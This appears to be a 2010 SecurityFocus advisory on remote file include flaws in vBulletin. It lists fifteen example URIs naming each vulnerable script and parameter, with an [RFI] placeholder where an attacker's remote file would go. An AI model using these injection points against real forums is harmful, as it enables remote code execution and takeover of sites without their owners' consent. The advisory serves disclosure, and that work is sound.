vBulletin Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/vB1/api.php?api_script=[RFI]
http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI]
http://www.example.com/vB1/includes/class_block.php?file=[RFI]
http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]
http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]
http://www.example.com/vB1/includes/functions.php?classfile=[RFI]
http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/vb/vb.php?filename=[RFI]
http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI]


 

Privacy Statement
Copyright 2010, SecurityFocus